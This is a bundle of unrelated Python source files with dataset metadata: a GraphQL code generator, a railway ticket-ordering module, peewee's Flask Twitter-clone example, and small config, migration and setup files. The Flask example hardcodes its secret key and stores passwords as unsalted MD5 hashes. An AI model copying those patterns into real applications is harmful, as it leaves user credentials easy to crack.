sel = self.selection_name(parent, '_as__%s' % type_condition, idx)
type_condition = self.format_typename_usage(type_condition)
idx += 1
lines.append('%s = %s.__as__(%s)' % (sel, parent, type_condition))
return self.format_selection_set(sel, children, lines, idx)
@staticmethod
def format_selection_set_fragment_spread(parent, name, lines, idx):
# call fragment function instead of Fragment.{name}
# as Fragment wasn't defined yet and it may contain circular
# dependencies
lines.append('%s.__fragment__(fragment_%s())' % (parent, name))
return SelectionFormatResult(lines, idx)
wrapper_map = {
'NON_NULL': 'sgqlc.types.non_null',
'LIST': 'sgqlc.types.list_of',
}
@staticmethod
def format_typename_usage(typename):
return '%s.%s' % ('_schema', typename)
def format_type_usage(self, typ):
wrapper = self.wrapper_map.get(typ['kind'])
if wrapper:
return '%s(%s)' % (wrapper, self.format_type_usage(typ['ofType']))
return self.format_typename_usage(typ['name'])
def format_variable_definition(self, node):
name = node.variable.name
typedef = self.format_type_usage(node.type)
defval = ''
if node.default_value:
defval = ', default=%r' % (node.default_value,)
return (name, 'sgqlc.types.Arg(%s%s)' % (typedef, defval))
def format_args_definitions(self, variable_definitions):
result = OrderedDict()
for d in variable_definitions:
k, v = self.format_variable_definition(d)
result[k] = v
return ', '.join('%s=%s' % r for r in result.items())
def format_selection_set(self, parent, selection_set, lines, idx):
for kind, *rest in selection_set:
if kind == 'field':
name, selection, children = rest
_, idx = self.format_selection_set_field(
parent, name, selection, children, lines, idx,
)
elif kind == 'inline_fragment':
type_condition, children = rest
_, idx = self.format_selection_set_inline_fragment(
parent, type_condition, children, lines, idx,
)
elif kind == 'fragment':
name, = rest
_, idx = self.format_selection_set_fragment_spread(
parent, name, lines, idx,
)
return SelectionFormatResult(lines, idx)
@classmethod
def selection_set_has_fragments(cls, selection_set):
if not selection_set:
return False
for kind, *rest in selection_set:
if kind == 'field':
_, _, children = rest
if cls.selection_set_has_fragments(children):
return True
elif kind == 'inline_fragment':
_, children = rest
if cls.selection_set_has_fragments(children):
return True
elif kind == 'fragment':
return True
return False
@staticmethod
def get_node_location(node):
source = node.loc.source
loc = source.get_location(node.loc.start)
return '%s:%d:%d' % (source.name, loc.line, loc.column)
@classmethod
def report_type_validation(cls, node, ex):
loc = cls.get_node_location(node)
raise SystemExit('no type named %s at %s' % (ex, loc)) from ex
@classmethod
def report_type_field_validation(cls, node, typ, ex):
loc = cls.get_node_location(node)
type_name = typ['name']
raise SystemExit('no field named %s on type %s at %s' %
(ex, type_name, loc)) from ex
@classmethod
def report_field_argument_validation(cls, node, typ, field, ex):
loc = cls.get_node_location(node)
field_name = field['name']
type_name = typ['name']
raise SystemExit('no argument named %s on field %s.%s at %s' %
(ex, type_name, field_name, loc)) from ex
@classmethod
def report_possible_type_validation(cls, node, typ, type_name):
loc = cls.get_node_location(node)
raise SystemExit('type %s not possible for %s at %s' %
(type_name, typ['name'], loc))
@classmethod
def report_unknown_variable(cls, node, ex):
loc = cls.get_node_location(node)
raise SystemExit('no variable named %s at %s' % (ex, loc)) from ex
@classmethod
def report_validation_error(cls, node, ex):
loc = cls.get_node_location(node)
raise SystemExit('validation failed: %s at %s' % (ex, loc)) from ex
@classmethod
def report_variable_definition(cls, node, ex):
loc = cls.get_node_location(node)
raise SystemExit('invalid variable definition: %s at %s' %
(ex, loc)) from ex
@classmethod
def report_unused_variables(cls, variables):
s = ', '.join(
'%s at %s' % (v.name, cls.get_node_location(v.node))
for v in variables
)
raise SystemExit('unused variable definitions: %s' % (s,))
def enter_operation_definition(self, node, *_args):
try:
operation = node.operation.value
typ = self.validation.get_operation_type(operation)
self.type_stack.append(typ)
except KeyError as ex:
self.report_type_validation(node, ex)
def leave_operation_definition(self, node, *_args):
args_definition = self.format_args_definitions(
node.variable_definitions or [],
)
if args_definition:
args_definition = ', variables=dict(%s)' % (args_definition,)
lines = [
'_op = sgqlc.operation.Operation'
'(_schema_root.%s_type, name=%r%s)' % (
node.operation.value,
node.name, args_definition),
]
self.format_selection_set('_op', node.selection_set, lines, 0)
lines.append('return _op')
self.type_stack.pop()
name = to_python_name(node.name)
return (node.operation.value, name, '''\
def %(operation)s_%(name)s():
%(lines)s
''' % {
'operation': node.operation.value,
'name': name,
'lines': '\n '.join(lines),
})
def enter_fragment_definition(self, node, *_args):
try:
typ = self.validation.get_type(node.type_condition.name.value)
self.type_stack.append(typ)
except KeyError as ex:
self.report_type_validation(node, ex)
def leave_fragment_definition(self, node, *_args):
lines = []
self.format_selection_set('_frag', node.selection_set, lines, 0)
lines.append('return _frag')
self.type_stack.pop()
name = to_python_name(node.name)
return ('fragment', name, '''\
def fragment_%(name)s():
_frag = sgqlc.operation.Fragment(%(type)s, %(gql_name)r)
%(lines)s
''' % {
'name': name,
'gql_name': node.name,
'type': self.format_typename_usage(node.type_condition['name']),
'lines': '\n '.join(lines)
})
@staticmethod
def leave_selection_set(node, *_args):
return node.selections
def enter_variable_definition(self, node, *_args):
self.current_variable_definition = Variable('<unknown>')
self.current_variable_definition.node = node
self.type_stack.append(None)
def leave_variable_definition(self, node, *_args):
v = self.current_variable_definition
v.type = node.type
v.default_value = node.default_value
try:
self.validation.validate_variable_definition(v)
except Exception as ex:
self.report_variable_definition(node, ex)
self.current_variable_definition = None
self.type_stack.pop()
def set_variable_definition_type(self, typ):
if not self.current_variable_definition:
return
self.current_variable_definition.type = typ
self.type_stack[-1] = typ
def leave_non_null_type(self, node, *_args):
typ = {'kind': 'NON_NULL', 'name': None, 'ofType': node.type}
self.set_variable_definition_type(typ)
return typ
def leave_list_type(self, node, *_args):
typ = {'kind': 'LIST', 'name': None, 'ofType': node.type}
self.set_variable_definition_type(typ)
return typ
def leave_named_type(self, node, *_args):
try:
name = node.name
typ = self.validation.get_type(name)
if not typ:
# fallback when validation is not being used
typ = {'kind': 'SCALAR', 'name': name, 'ofType': None}
self.set_variable_definition_type(typ)
return typ
except KeyError as ex:
self.report_type_validation(node, ex)
def enter_field(self, node, *_args):
typ = self.type_stack[-1]
try:
field = self.validation.get_type_field(typ, node.name.value)
self.field_stack.append(field)
if not field:
self.type_stack.append(None)
return
inner_type = self.validation.unwrap_type(field['type'])
type_name = inner_type['name']
typ = self.validation.get_type(type_name)
self.type_stack.append(typ)
except KeyError as ex:
self.report_type_field_validation(node, typ, ex)
def validate_required_arguments(self, node):
field = self.field_stack[-1]
if not field:
return
required = set()
for a in field['args'].values():
if is_value_required(a):
required.add(a['name'])
for name, _ in node.arguments:
if name in required:
required.remove(name)
if required:
raise ValueError(
'missing required arguments: %s at %s' %
(', '.join(required), self.get_node_location(node))
)
def leave_field(self, node, *_args):
self.validate_required_arguments(node)
args = node.arguments
alias = ''
if node.alias:
alias = to_python_name(node.alias)
args = list(args) + [('__alias__', alias)]
name = to_python_name(node.name)
selection = '%(name)s(%(args)s)' % {
'name': name,
'args': ', '.join('%s=%r' % a for a in args),
}
if not alias:
alias = name
children = node.selection_set
self.type_stack.pop()
self.field_stack.pop()
return ('field', alias, selection, children)
def enter_argument(self, node, *_args):
typ = self.type_stack[-2]
field = self.field_stack[-1]
try:
name = node.name.value
arg = self.validation.get_field_argument(field, name)
if not arg:
self.type_stack.append(None)
return
self.type_stack.append(arg['type'])
except KeyError as ex:
self.report_field_argument_validation(node, typ, field, ex)
def leave_argument(self, node, *_args):
self.type_stack.pop()
return (to_python_name(node.name), node.value)
@staticmethod
def leave_fragment_spread(node, *_args):
return ('fragment', to_python_name(node.name))
def enter_inline_fragment(self, node, *_args):
typ = self.type_stack[-1]
if not typ:
self.type_stack.append(None)
return
type_name = node.type_condition.name.value
if type_name not in typ['possibleTypes']:
self.report_possible_type_validation(node, typ, type_name)
try:
typ = self.validation.get_type(type_name)
self.type_stack.append(typ)
except KeyError as ex:
self.report_type_validation(node, ex)
def leave_inline_fragment(self, node, *_args):
self.type_stack.pop()
return ('inline_fragment', node.type_condition['name'],
node.selection_set)
def validate_value(self, node, candidate_type, value):
try:
self.validation.validate_type(
self.type_stack[-1],
candidate_type,
value,
)
except Exception as ex:
self.report_validation_error(node, ex)
def leave_int_value(self, node, *_args):
value = int(node.value)
self.validate_value(node, 'Int', value)
return value
def leave_float_value(self, node, *_args):
value = float(node.value)
self.validate_value(node, 'Float', value)
return value
def leave_string_value(self, node, *_args):
value = node.value
self.validate_value(node, 'String', value)
return value
def leave_boolean_value(self, node, *_args):
value = node.value
self.validate_value(node, 'Boolean', value)
return value
def leave_null_value(self, node, *_args):
value = Null() # can't return None due Visitor() pattern
self.validate_value(node, 'Null', value)
return value
def leave_enum_value(self, node, *_args):
value = node.value
self.validate_value(node, 'Enum', value)
return value
@staticmethod
def leave_list_value(node, *_args):
return node.values
def leave_object_value(self, node, *_args):
value = dict(node.fields)
try:
self.validation.validate_input_object_fields(
self.type_stack[-1],
value,
)
except Exception as ex:
self.report_validation_error(node, ex)
return value
def enter_object_field(self, node, *_args):
typ = self.type_stack[-1]
if not typ:
self.type_stack.append(None)
return
try:
name = node.name.value
inner_type = self.validation.unwrap_type(typ)
typ = self.validation.get_type(inner_type['name'])
field = self.validation.get_type_field(typ, name)
self.type_stack.append(field['type'])
except KeyError as ex:
self.report_type_field_validation(node, typ, ex)
def leave_object_field(self, node, *_args):
self.type_stack.pop()
return (node.name, node.value)
class CodeGen:
def __init__(self, schema, schema_name, operations_gql,
writer, short_names):
'''
:param schema: if provided (not ``None``), will do validation
using :class:`SchemaValidation`, otherwise no validation
is done. It must be an introspection query result, usually
loaded from a JSON file.
:type schema: dict or None
:param schema_name: where to look for SGQLC schema.
:type schema_name: :class:`ParsedSchemaName`
:param operations_gql: a sequence of
:class:`graphql.language.source.Source` to parse.
:type operations_gql: list of :class:`graphql.language.source.Source`
:param writer: function used to output strings.
:type writer: function that receives a str and returns nothing
:param short_names: if ``True``, selection names will be short,
using a sequential index rather than the name prefix. This
improves loading huge files at the expense of readability.
:type short_names: bool
'''
self.schema = schema
self.schema_name = schema_name
self.operations_gql = operations_gql
self.writer = writer
self.short_names = short_names
if schema:
self.validation = SchemaValidation(schema)
else:
self.validation = NoValidation()
def write(self):
self.write_header()
self.write_operations()
def write_header(self):
self.writer('import sgqlc.types\n')
self.writer('import sgqlc.operation\n')
if self.schema_name.path:
self.writer('from %s import %s' %
(self.schema_name.path, self.schema_name.modname))
else:
self.writer('import ' + self.schema_name.modname)
self.writer('''
_schema = %s
_schema_root = _schema.%s
__all__ = ('Operations',)
''' % (self.schema_name.modname, self.schema_name.sym))
def write_operations(self):
for source in self.operations_gql:
self.write_operation(source)
def write_operation(self, source):
gql = parse_graphql(source)
kind_operations = {}
visitor = GraphQLToPython(
self.validation,
self.schema_name,
self.short_names,
)
for kind, name, code in visit(gql, visitor):
kind_operations.setdefault(kind, []).append((name, code))
# sort so fragments come first (fragment, mutation, query)
kinds = []
for kind, code_list in sorted(kind_operations.items()):
names = []
for name, code in code_list:
self.writer('\n\n')
self.writer(code)
names.append(name)
kinds.append(kind)
self.writer('\n\nclass %s:\n' % (kind.title(),))
for name in sorted(names):
self.writer(' %s = %s_%s()\n' % (name, kind, name))
self.writer('\n\nclass Operations:\n')
for kind in kinds:
self.writer(' %s = %s\n' % (kind, kind.title()))
def add_arguments(ap):
ap.add_argument(
'schema-name',
help='The schema name to use in the imports. '
'It must be in the form: `modname:symbol`. '
'It may contain leading `.` to change the import '
'statement to `from . import` using that as path. '
'If `:symbol` is omitted, then `modname` is used.',
)
ap.add_argument(
'operations.py', type=argparse.FileType('w'), nargs='?',
help=('The output operations as Python file using '
'sgqlc.operation. Defaults to the stdout'),
default=sys.stdout,
)
ap.add_argument(
'operation.gql',
type=argparse.FileType('r'), nargs='*',
help='The input GraphQL (DSL) with operations',
default=[sys.stdin],
)
ap.add_argument(
'--schema', type=argparse.FileType('r'),
help=('The input schema as JSON file. '
'Usually the output from introspection query. '
'If given, the operations will be validated.'),
default=None,
)
ap.add_argument(
'--short-names', '-s',
help='Use short selection names',
default=False,
action='store_true',
)
def load_schema(in_file):
if not in_file:
return None
schema = json.load(in_file)
if not isinstance(schema, dict):
raise SystemExit('schema must be a JSON object')
if schema.get('types'):
return schema
elif schema.get('data', {}).get('__schema', None):
return schema['data']['__schema'] # plain HTTP endpoint result
elif schema.get('__schema'):
return schema['__schema'] # introspection field
else:
raise SystemExit(
'schema must be introspection object or query result')
def handle_command(parsed_args):
args = vars(parsed_args) # vars: operations.py and operation.gql
schema = load_schema(args['schema'])
schema_name = ParsedSchemaName.parse_schema_name(args['schema-name'])
out_file = args['operations.py']
in_files = args['operation.gql']
short_names = args['short_names']
operations_gql = [Source(f.read(), f.name) for f in in_files]
gen = CodeGen(
schema, schema_name, operations_gql,
out_file.write, short_names,
)
gen.write()
out_file.close()
def main():
ap = argparse.ArgumentParser(
description='Generate sgqlc operations using GraphQL (DSL)',
)
add_arguments(ap)
handle_command(ap.parse_args())
if __name__ == '__main__':
main()
| 32.838266 | 78 | 0.588926 |
4a20ef46d2f862c961842e6cfaa583beb71ff9e2 | 3,501 | py | Python | inter/CheckOrderInfo.py | middleprince/12306 | 31043bd053c2414b1be3e474184bb0c48c3abcca | [
"MIT"
] | 33,601 | 2018-01-08T14:37:50.000Z | 2022-03-31T06:45:04.000Z | inter/CheckOrderInfo.py | middleprince/12306 | 31043bd053c2414b1be3e474184bb0c48c3abcca | [
"MIT"
] | 724 | 2018-01-09T00:36:29.000Z | 2022-03-14T01:38:43.000Z | inter/CheckOrderInfo.py | middleprince/12306 | 31043bd053c2414b1be3e474184bb0c48c3abcca | [
"MIT"
] | 10,650 | 2018-01-08T03:26:48.000Z | 2022-03-31T01:50:15.000Z | # coding=utf-8
from collections import OrderedDict
from inter.GetQueueCount import getQueueCount
from inter.GetRepeatSubmitToken import getRepeatSubmitToken
class checkOrderInfo:
def __init__(self, session, train_no, set_type, passengerTicketStrList, oldPassengerStr, station_dates, ticket_peoples):
self.train_no = train_no
self.set_type = set_type
self.passengerTicketStrList = passengerTicketStrList
self.oldPassengerStr = oldPassengerStr
self.station_dates = station_dates
self.ticket_peoples = ticket_peoples
self.RepeatSubmitToken = getRepeatSubmitToken(session)
self.getTicketInfoForPassengerForm = self.RepeatSubmitToken.sendGetRepeatSubmitToken()
self.ticketInfoForPassengerForm = self.getTicketInfoForPassengerForm.get("ticketInfoForPassengerForm", "")
self.token = self.getTicketInfoForPassengerForm.get("token", "")
self.session = self.getTicketInfoForPassengerForm.get("session", "")
def data_par(self):
"""
参数结构
:return:
"""
data = OrderedDict()
data['bed_level_order_num'] = "000000000000000000000000000000"
data['passengerTicketStr'] = self.passengerTicketStrList.rstrip("_{0}".format(self.set_type))
data['oldPassengerStr'] = self.oldPassengerStr
data['tour_flag'] = 'dc'
data['randCode'] = ""
data['cancel_flag'] = 2
data['_json_att'] = ""
data['REPEAT_SUBMIT_TOKEN'] = self.token
return data
def sendCheckOrderInfo(self):
"""
检查支付订单,需要提交REPEAT_SUBMIT_TOKEN
passengerTicketStr : 座位编号,0,票类型,乘客名,证件类型,证件号,手机号码,保存常用联系人(Y或N)
oldPassengersStr: 乘客名,证件类型,证件号,乘客类型
:return:
"""
CheckOrderInfoUrls = self.session.urls["checkOrderInfoUrl"]
data = self.data_par()
checkOrderInfoRep = self.session.httpClint.send(CheckOrderInfoUrls, data)
data = checkOrderInfoRep.get("data", {})
if data and data.get("submitStatus", False):
print (u'车票提交通过,正在尝试排队')
ifShowPassCodeTime = int(checkOrderInfoRep["data"]["ifShowPassCodeTime"]) / float(1000)
if "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep["data"]["ifShowPassCode"] == "Y":
is_need_code = True
elif "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep['data']['submitStatus'] is True:
is_need_code = False
else:
is_need_code = False
QueueCount = getQueueCount(self.session,
is_need_code,
ifShowPassCodeTime,
self.set_type,
self.station_dates,
self.train_no,
self.ticket_peoples,
self.ticketInfoForPassengerForm,
self.token,
self.oldPassengerStr,
self.passengerTicketStrList,
)
QueueCount.sendGetQueueCount()
elif "errMsg" in data and data["errMsg"]:
print(checkOrderInfoRep['data']["errMsg"])
elif 'messages' in checkOrderInfoRep and checkOrderInfoRep['messages']:
print (checkOrderInfoRep['messages'][0]) | 47.310811 | 124 | 0.595544 |
4a20f0286a52c94846813fe9a6a17e70cae8b440 | 11,438 | py | Python | examples/twitter/app.py | Walicen/peewee | e9c8bbf912903e167e052d07f6247801dd0346aa | [
"MIT"
] | 1 | 2019-11-17T04:55:26.000Z | 2019-11-17T04:55:26.000Z | examples/twitter/app.py | Walicen/peewee | e9c8bbf912903e167e052d07f6247801dd0346aa | [
"MIT"
] | 1 | 2021-01-31T08:37:28.000Z | 2021-01-31T08:37:28.000Z | examples/twitter/app.py | Walicen/peewee | e9c8bbf912903e167e052d07f6247801dd0346aa | [
"MIT"
] | 1 | 2020-03-08T10:00:27.000Z | 2020-03-08T10:00:27.000Z | import datetime
from flask import Flask
from flask import g
from flask import redirect
from flask import request
from flask import session
from flask import url_for, abort, render_template, flash
from functools import wraps
from hashlib import md5
from peewee import *
# config - aside from our database, the rest is for use by Flask
DATABASE = 'tweepee.db'
DEBUG = True
SECRET_KEY = 'hin6bab8ge25*r=x&+5$0kn=-#log$pt^#@vrqjld!^2ci@g*b'
# create a flask application - this ``app`` object will be used to handle
# inbound requests, routing them to the proper 'view' functions, etc
app = Flask(__name__)
app.config.from_object(__name__)
# create a peewee database instance -- our models will use this database to
# persist information
database = SqliteDatabase(DATABASE)
# model definitions -- the standard "pattern" is to define a base model class
# that specifies which database to use. then, any subclasses will automatically
# use the correct storage. for more information, see:
# http://charlesleifer.com/docs/peewee/peewee/models.html#model-api-smells-like-django
class BaseModel(Model):
class Meta:
database = database
# the user model specifies its fields (or columns) declaratively, like django
class User(BaseModel):
username = CharField(unique=True)
password = CharField()
email = CharField()
join_date = DateTimeField()
# it often makes sense to put convenience methods on model instances, for
# example, "give me all the users this user is following":
def following(self):
# query other users through the "relationship" table
return (User
.select()
.join(Relationship, on=Relationship.to_user)
.where(Relationship.from_user == self)
.order_by(User.username))
def followers(self):
return (User
.select()
.join(Relationship, on=Relationship.from_user)
.where(Relationship.to_user == self)
.order_by(User.username))
def is_following(self, user):
return (Relationship
.select()
.where(
(Relationship.from_user == self) &
(Relationship.to_user == user))
.exists())
def gravatar_url(self, size=80):
return 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \
(md5(self.email.strip().lower().encode('utf-8')).hexdigest(), size)
# this model contains two foreign keys to user -- it essentially allows us to
# model a "many-to-many" relationship between users. by querying and joining
# on different columns we can expose who a user is "related to" and who is
# "related to" a given user
class Relationship(BaseModel):
from_user = ForeignKeyField(User, backref='relationships')
to_user = ForeignKeyField(User, backref='related_to')
class Meta:
indexes = (
# Specify a unique multi-column index on from/to-user.
(('from_user', 'to_user'), True),
)
# a dead simple one-to-many relationship: one user has 0..n messages, exposed by
# the foreign key. because we didn't specify, a users messages will be accessible
# as a special attribute, User.message_set
class Message(BaseModel):
user = ForeignKeyField(User, backref='messages')
content = TextField()
pub_date = DateTimeField()
# simple utility function to create tables
def create_tables():
with database:
database.create_tables([User, Relationship, Message])
# flask provides a "session" object, which allows us to store information across
# requests (stored by default in a secure cookie). this function allows us to
# mark a user as being logged-in by setting some values in the session data:
def auth_user(user):
session['logged_in'] = True
session['user_id'] = user.id
session['username'] = user.username
flash('You are logged in as %s' % (user.username))
# get the user from the session
def get_current_user():
if session.get('logged_in'):
return User.get(User.id == session['user_id'])
# view decorator which indicates that the requesting user must be authenticated
# before they can access the view. it checks the session to see if they're
# logged in, and if not redirects them to the login view.
def login_required(f):
@wraps(f)
def inner(*args, **kwargs):
if not session.get('logged_in'):
return redirect(url_for('login'))
return f(*args, **kwargs)
return inner
# given a template and a SelectQuery instance, render a paginated list of
# objects from the query inside the template
def object_list(template_name, qr, var_name='object_list', **kwargs):
kwargs.update(
page=int(request.args.get('page', 1)),
pages=qr.count() / 20 + 1)
kwargs[var_name] = qr.paginate(kwargs['page'])
return render_template(template_name, **kwargs)
# retrieve a single object matching the specified query or 404 -- this uses the
# shortcut "get" method on model, which retrieves a single object or raises a
# DoesNotExist exception if no matching object exists
# http://charlesleifer.com/docs/peewee/peewee/models.html#Model.get)
def get_object_or_404(model, *expressions):
try:
return model.get(*expressions)
except model.DoesNotExist:
abort(404)
# custom template filter -- flask allows you to define these functions and then
# they are accessible in the template -- this one returns a boolean whether the
# given user is following another user.
@app.template_filter('is_following')
def is_following(from_user, to_user):
return from_user.is_following(to_user)
# Request handlers -- these two hooks are provided by flask and we will use them
# to create and tear down a database connection on each request.
@app.before_request
def before_request():
g.db = database
g.db.connect()
@app.after_request
def after_request(response):
g.db.close()
return response
# views -- these are the actual mappings of url to view function
@app.route('/')
def homepage():
# depending on whether the requesting user is logged in or not, show them
# either the public timeline or their own private timeline
if session.get('logged_in'):
return private_timeline()
else:
return public_timeline()
@app.route('/private/')
def private_timeline():
# the private timeline exemplifies the use of a subquery -- we are asking for
# messages where the person who created the message is someone the current
# user is following. these messages are then ordered newest-first.
user = get_current_user()
messages = (Message
.select()
.where(Message.user << user.following())
.order_by(Message.pub_date.desc()))
return object_list('private_messages.html', messages, 'message_list')
@app.route('/public/')
def public_timeline():
# simply display all messages, newest first
messages = Message.select().order_by(Message.pub_date.desc())
return object_list('public_messages.html', messages, 'message_list')
@app.route('/join/', methods=['GET', 'POST'])
def join():
if request.method == 'POST' and request.form['username']:
try:
with database.atomic():
# Attempt to create the user. If the username is taken, due to the
# unique constraint, the database will raise an IntegrityError.
user = User.create(
username=request.form['username'],
password=md5((request.form['password']).encode('utf-8')).hexdigest(),
email=request.form['email'],
join_date=datetime.datetime.now())
# mark the user as being 'authenticated' by setting the session vars
auth_user(user)
return redirect(url_for('homepage'))
except IntegrityError:
flash('That username is already taken')
return render_template('join.html')
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST' and request.form['username']:
try:
pw_hash = md5(request.form['password'].encode('utf-8')).hexdigest()
user = User.get(
(User.username == request.form['username']) &
(User.password == pw_hash))
except User.DoesNotExist:
flash('The password entered is incorrect')
else:
auth_user(user)
return redirect(url_for('homepage'))
return render_template('login.html')
@app.route('/logout/')
def logout():
session.pop('logged_in', None)
flash('You were logged out')
return redirect(url_for('homepage'))
@app.route('/following/')
@login_required
def following():
user = get_current_user()
return object_list('user_following.html', user.following(), 'user_list')
@app.route('/followers/')
@login_required
def followers():
user = get_current_user()
return object_list('user_followers.html', user.followers(), 'user_list')
@app.route('/users/')
def user_list():
users = User.select().order_by(User.username)
return object_list('user_list.html', users, 'user_list')
@app.route('/users/<username>/')
def user_detail(username):
# using the "get_object_or_404" shortcut here to get a user with a valid
# username or short-circuit and display a 404 if no user exists in the db
user = get_object_or_404(User, User.username == username)
# get all the users messages ordered newest-first -- note how we're accessing
# the messages -- user.message_set. could also have written it as:
# Message.select().where(Message.user == user)
messages = user.messages.order_by(Message.pub_date.desc())
return object_list('user_detail.html', messages, 'message_list', user=user)
@app.route('/users/<username>/follow/', methods=['POST'])
@login_required
def user_follow(username):
user = get_object_or_404(User, User.username == username)
try:
with database.atomic():
Relationship.create(
from_user=get_current_user(),
to_user=user)
except IntegrityError:
pass
flash('You are following %s' % user.username)
return redirect(url_for('user_detail', username=user.username))
@app.route('/users/<username>/unfollow/', methods=['POST'])
@login_required
def user_unfollow(username):
user = get_object_or_404(User, User.username == username)
(Relationship
.delete()
.where(
(Relationship.from_user == get_current_user()) &
(Relationship.to_user == user))
.execute())
flash('You are no longer following %s' % user.username)
return redirect(url_for('user_detail', username=user.username))
@app.route('/create/', methods=['GET', 'POST'])
@login_required
def create():
user = get_current_user()
if request.method == 'POST' and request.form['content']:
message = Message.create(
user=user,
content=request.form['content'],
pub_date=datetime.datetime.now())
flash('Your message has been created')
return redirect(url_for('user_detail', username=user.username))
return render_template('create.html')
@app.context_processor
def _inject_user():
return {'current_user': get_current_user()}
# allow running from the command line
if __name__ == '__main__':
create_tables()
app.run()
| 36.311111 | 89 | 0.673195 |
4a20f18111bf36fd922e7d81a8bea980b6ab4016 | 797 | py | Python | imperative/python/megengine/conftest.py | Olalaye/MegEngine | 695d24f24517536e6544b07936d189dbc031bbce | [
"Apache-2.0"
] | 1 | 2022-03-21T03:13:45.000Z | 2022-03-21T03:13:45.000Z | imperative/python/megengine/conftest.py | Olalaye/MegEngine | 695d24f24517536e6544b07936d189dbc031bbce | [
"Apache-2.0"
] | null | null | null | imperative/python/megengine/conftest.py | Olalaye/MegEngine | 695d24f24517536e6544b07936d189dbc031bbce | [
"Apache-2.0"
] | null | null | null | import pytest
import megengine
@pytest.fixture(autouse=True)
def import_megengine_path(doctest_namespace):
doctest_namespace["mge"] = megengine
doctest_namespace["Tensor"] = megengine.Tensor
doctest_namespace["F"] = megengine.functional
doctest_namespace["M"] = megengine.module
doctest_namespace["Q"] = megengine.quantization
doctest_namespace["data"] = megengine.data
doctest_namespace["autodiff"] = megengine.autodiff
doctest_namespace["optim"] = megengine.optimizer
doctest_namespace["jit"] = megengine.jit
doctest_namespace["amp"] = megengine.amp
doctest_namespace["dist"] = megengine.distributed
doctest_namespace["tm"] = megengine.traced_module
doctest_namespace["hub"] = megengine.hub
doctest_namespace["utils"] = megengine.utils
| 36.227273 | 54 | 0.750314 |
4a20f1ea6a8c97b2f23c931126e6b5b7a6650921 | 1,920 | py | Python | djangocms_fbcomments/migrations/0001_initial.py | mishbahr/djangocms-fbcomments | 4e6bf2c636196fee85a489b510f13ae67ae05af6 | [
"BSD-3-Clause"
] | 20 | 2015-09-29T10:00:56.000Z | 2018-06-15T03:28:36.000Z | djangocms_fbcomments/migrations/0001_initial.py | mishbahr/djangocms-fbcomments | 4e6bf2c636196fee85a489b510f13ae67ae05af6 | [
"BSD-3-Clause"
] | 1 | 2020-05-14T02:23:00.000Z | 2020-05-27T14:45:59.000Z | djangocms_fbcomments/migrations/0001_initial.py | mishbahr/djangocms-fbcomments | 4e6bf2c636196fee85a489b510f13ae67ae05af6 | [
"BSD-3-Clause"
] | 2 | 2016-08-04T21:35:40.000Z | 2020-05-14T02:19:06.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from djangocms_fbcomments.conf import settings
class Migration(migrations.Migration):
dependencies = [
('cms', '__latest__'),
]
operations = [
migrations.CreateModel(
name='FacebookComments',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('app_id', models.CharField(default=settings.DJANGOCMS_FBCOMMENTS_APP_ID, max_length=100, verbose_name='Facebook App ID')),
('title', models.CharField(max_length=255, verbose_name='Title', blank=True)),
('num_posts', models.PositiveIntegerField(default=10, help_text='The number of comments to show by default.', verbose_name='Number of Comments')),
('order_by', models.CharField(default=settings.DJANGOCMS_FBCOMMENTS_COMMENTS_ORDERING[0][0], help_text='The order to use when displaying comments.', max_length=20, verbose_name='Comments Ordering', choices=settings.DJANGOCMS_FBCOMMENTS_COMMENTS_ORDERING)),
('colour_scheme', models.CharField(default=settings.DJANGOCMS_FBCOMMENTS_COLOUR_SCHEMES[0][0], max_length=50, verbose_name='Colour Scheme', choices=settings.DJANGOCMS_FBCOMMENTS_COLOUR_SCHEMES)),
('load_trigger', models.CharField(default=settings.DJANGOCMS_FBCOMMENTS_LOADING_CHOICES[0][0], max_length=100, verbose_name='How to load comments', choices=settings.DJANGOCMS_FBCOMMENTS_LOADING_CHOICES)),
('button_text', models.CharField(help_text='By default it will be "Load Comments..."', max_length=100, verbose_name='Button Text', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
]
| 56.470588 | 272 | 0.685938 |
4a20f25e4d6a5d918d3db80cf44957c3c78cedb0 | 1,149 | py | Python | setup.py | nikvdp/notion-py | 57a2989b96870bfb119304c7c9df8d09ab7091b3 | [
"MIT"
] | null | null | null | setup.py | nikvdp/notion-py | 57a2989b96870bfb119304c7c9df8d09ab7091b3 | [
"MIT"
] | null | null | null | setup.py | nikvdp/notion-py | 57a2989b96870bfb119304c7c9df8d09ab7091b3 | [
"MIT"
] | null | null | null | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
def get_requirements(fname):
"Takes requirements from requirements.txt and returns a list."
with open(fname) as fp:
reqs = list()
for lib in fp.read().split("\n"):
# Ignore pypi flags and comments
if not lib.startswith("-") or lib.startswith("#"):
reqs.append(lib.strip())
return reqs
install_requires = get_requirements("requirements.txt")
setuptools.setup(
name="notion",
version="0.0.26",
author="Jamie Alexandre",
author_email="[email protected]",
description="Unofficial Python API client for Notion.so",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/jamalex/notion-py",
install_requires=install_requires,
include_package_data=True,
packages=setuptools.find_packages(),
python_requires=">=3.5",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 29.461538 | 66 | 0.653612 |
4a20f29a1443150fdced8fd6a7410194c2ea2edd | 358 | py | Python | test.py | drsolaris/exploding_mewgenics | 66b162fc83888ada74070fbaed5f70292f684b7c | [
"Unlicense"
] | null | null | null | test.py | drsolaris/exploding_mewgenics | 66b162fc83888ada74070fbaed5f70292f684b7c | [
"Unlicense"
] | null | null | null | test.py | drsolaris/exploding_mewgenics | 66b162fc83888ada74070fbaed5f70292f684b7c | [
"Unlicense"
] | null | null | null | from game.game import Game
import pickle
file_Name = '462.net' #1456 1149
with open(file_Name, 'rb') as fileObject:
net1 = pickle.load(fileObject)
file_Name = '1027.net' #1119 #584
with open(file_Name, 'rb') as fileObject:
net2 = pickle.load(fileObject)
wins = 0
for _ in range(100):
game = Game([net1, net2])
wins += game.play()
print(wins/100)
| 19.888889 | 41 | 0.695531 |
